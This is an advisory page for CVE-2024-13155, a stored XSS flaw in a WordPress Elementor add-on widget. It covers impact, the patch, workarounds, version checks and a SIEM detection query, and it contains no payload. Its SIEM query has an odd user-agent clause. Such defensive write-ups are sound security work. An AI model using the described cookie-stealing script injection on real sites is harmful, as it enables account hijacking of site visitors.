CVE-2024-13155
📋 TL;DR
The Unlimited Elements For Elementor WordPress plugin has a stored XSS vulnerability in its Transparent Split Hero widget. Authenticated attackers with contributor-level access or higher can inject malicious scripts that execute when users view compromised pages. This affects all versions up to 1.5.140.
💻 Affected Systems
- Unlimited Elements For Elementor WordPress plugin
📦 What is this software?
Unlimited Elements For Elementor by Unlimited Elements
⚠️ Risk & Real-World Impact
Worst Case
Attackers could steal admin credentials, deface websites, redirect users to malicious sites, or install backdoors for persistent access.
Likely Case
Attackers with contributor accounts inject malicious scripts to steal user session cookies or display phishing content to visitors.
If Mitigated
With proper user access controls and content security policies, impact is limited to potential defacement of specific pages.
🎯 Exploit Status
Exploitation requires contributor-level WordPress access. The vulnerability is straightforward to exploit once authenticated.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: Versions after 1.5.140
Vendor Advisory: https://unlimited-elements.com/change-log/
Restart Required: No
Instructions:
1. Update plugin to latest version. 2. Delete the Transparent Split Hero widget. 3. Reinstall the Transparent Split Hero widget from the plugin interface.
🔧 Temporary Workarounds
Remove vulnerable widget
allDelete the Transparent Split Hero widget to eliminate the attack vector
Navigate to WordPress admin > Elementor > My Templates > Saved Templates, find and delete Transparent Split Hero widget
Restrict user roles
allLimit contributor-level access to trusted users only
Use WordPress role management plugins or functions to restrict contributor accounts
🧯 If You Can't Patch
- Remove the Transparent Split Hero widget from all pages and templates
- Implement Content Security Policy headers to restrict script execution
🔍 How to Verify
Check if Vulnerable:
Check WordPress admin > Plugins > Unlimited Elements For Elementor version. If version is 1.5.140 or lower and Transparent Split Hero widget is installed, you are vulnerable.Check Version:
wp plugin get unlimited-elements-for-elementor --field=versionVerify Fix Applied:
After updating and reinstalling widget, test widget functionality and check that script tags in widget attributes are properly sanitized.📡 Detection & Monitoring
Log Indicators:
- Unusual POST requests to Elementor/widget endpoints from contributor accounts
- Script tags in widget attribute fields
Network Indicators:
- External script loads from widget content that shouldn't contain scripts
SIEM Query:
source="wordpress" AND (uri_path="/wp-admin/admin-ajax.php" OR uri_path="/wp-json/") AND (user_agent CONTAINS "contributor" OR params CONTAINS "<script")